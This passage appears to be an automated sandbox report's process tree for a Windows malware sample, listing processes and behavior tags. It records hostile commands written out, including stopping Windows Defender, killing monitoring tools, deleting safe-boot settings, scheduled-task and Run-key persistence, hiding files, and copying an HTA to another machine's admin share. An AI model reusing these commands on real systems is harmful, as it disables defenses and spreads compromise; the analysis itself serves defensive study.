9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 96 PID 3376 wrote to memory of 5604 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 96 PID 3376 wrote to memory of 5604 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 96 PID 5924 wrote to memory of 5136 5924 WScript.exe 97 PID 5924 wrote to memory of 5136 5924 WScript.exe 97 PID 5924 wrote to memory of 5136 5924 WScript.exe 97 PID 4268 wrote to memory of 2952 4268 WScript.exe 103 PID 4268 wrote to memory of 2952 4268 WScript.exe 103 PID 4268 wrote to memory of 2952 4268 WScript.exe 103 PID 4268 wrote to memory of 4816 4268 WScript.exe 399 PID 4268 wrote to memory of 4816 4268 WScript.exe 399 PID 4268 wrote to memory of 4816 4268 WScript.exe 399 PID 4268 wrote to memory of 3576 4268 WScript.exe 109 PID 4268 wrote to memory of 3576 4268 WScript.exe 109 PID 4268 wrote to memory of 3576 4268 WScript.exe 109 PID 4700 wrote to memory of 416 4700 LEGIT_SOFTWARE2.EXE 111 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 5668 attrib.exe 3584 attrib.exe 4048 attrib.exe 1720 attrib.exe 5528 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXECUTION.JS"2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:6132
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3812
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4428
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:4980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:1248 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1720
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:3840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5380
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:6124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:344
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2836
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3408
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5904
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2848
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:936
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1936
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2320
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4840
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2584
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4752
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2680
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3016
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5528
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5364
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4340
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5400
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2980
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4232
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2324
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:6024
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Program Files (x86)\VLC1.EXE"C:\Program Files (x86)\VLC1.EXE"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h4⤵PID:2348
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\VLC1.EXE" +s +h5⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h4⤵PID:1956
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1720
-
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
C:\Program Files (x86)\WINDOWS DEFENDER.EXE"C:\Program Files (x86)\WINDOWS DEFENDER.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:5056 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp95E7.tmp.bat""4⤵PID:5016
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1532
-
-
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"5⤵
- Executes dropped EXE
PID:2600
-
-
-
-
C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5828
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FINDM10E.VBS"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Windows\Temp\svchost_533423.exe3⤵PID:5916
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Windows\Temp\svchost_533423.exe4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5668
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Service WinDefend -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name taskmgr.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name cmd.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name regedit.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name procexp.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name processhacker.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /deletevalue {current} safeboot3⤵PID:6012
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f3⤵PID:5096
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f4⤵
- Modifies registry key
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cipher /e /s:C:\Windows\Temp\3⤵PID:4584
-
C:\Windows\SysWOW64\cipher.execipher /e /s:C:\Windows\Temp\4⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe3⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\findme_579518.exe3⤵PID:5776
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INSTALLE10R.VBS"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Public\Documents\winservice_533423.exe3⤵PID:5136
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Public\Documents\winservice_533423.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5908
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4364 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7AFC.tmp\7AFD.tmp\7AFE.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"3⤵
- Modifies registry class
PID:5428 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbx.vbs"4⤵PID:2440
-
-
C:\Windows\system32\net.exenet stop "WSearch"4⤵PID:5668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WSearch"5⤵PID:784
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "https://watchfurry4k.com"4⤵
- Modifies Internet Explorer settings
PID:3164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7B1B.tmp\7B1C.tmp\7B1D.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"3⤵PID:416
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2896
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2700
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1800
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4504
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5756
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5212
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4432
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:412
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5512
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL.VBS"2⤵
- System Location Discovery: System Language Discovery
PID:5832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sys32.hta \\BFFC-PC\C$\Users\Public\sys32.hta3⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"2⤵
- Executes dropped EXE
PID:4980 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5688 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4416 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"6⤵
- Executes dropped EXE
PID:2276 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1708 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2148 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"9⤵
- Executes dropped EXE
PID:5268 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4752 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"11⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1720 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"12⤵
- Executes dropped EXE
PID:2116 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"13⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"14⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2788 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"15⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:848 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"16⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5608 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"17⤵
- Executes dropped EXE
PID:2468 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"18⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2632 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"19⤵
- Executes dropped EXE
PID:2336 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"20⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4100 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"21⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5256 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"22⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5584 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"23⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4244 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"24⤵
- Executes dropped EXE
PID:560 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"25⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"26⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"27⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1628 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"28⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2352 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"29⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1764 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"30⤵
- Executes dropped EXE
PID:5216 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"31⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4516 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"32⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5656 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"33⤵
- Executes dropped EXE
PID:1100 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"34⤵
- Executes dropped EXE
PID:1292 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"35⤵
- Executes dropped EXE
PID:4508 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"36⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3348 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"37⤵
- Executes dropped EXE
PID:2744 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"38⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"39⤵
- Executes dropped EXE
PID:2628 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"40⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5692 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"41⤵
- Executes dropped EXE
PID:5052 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"42⤵
- Executes dropped EXE
PID:3480 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"43⤵
- Executes dropped EXE
PID:4144 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"44⤵
- Executes dropped EXE
PID:1104 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"45⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"46⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:848 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"47⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5904 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"48⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4968 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"49⤵
- Executes dropped EXE
PID:2120 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"50⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5776 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"51⤵
- Executes dropped EXE
PID:2404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"52⤵
- Drops file in System32 directory
PID:4600 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"53⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"54⤵PID:1112
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"55⤵
- Drops file in System32 directory
PID:412 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"56⤵
- Drops file in System32 directory
PID:1036 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"57⤵
- System Location Discovery: System Language Discovery
PID:3584 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"58⤵PID:3284
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"59⤵PID:3948
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"60⤵
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"61⤵
- System Location Discovery: System Language Discovery
PID:4932 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"62⤵PID:2352
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"63⤵
- Drops file in System32 directory
PID:4852 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"64⤵
- Drops file in System32 directory
PID:732 -
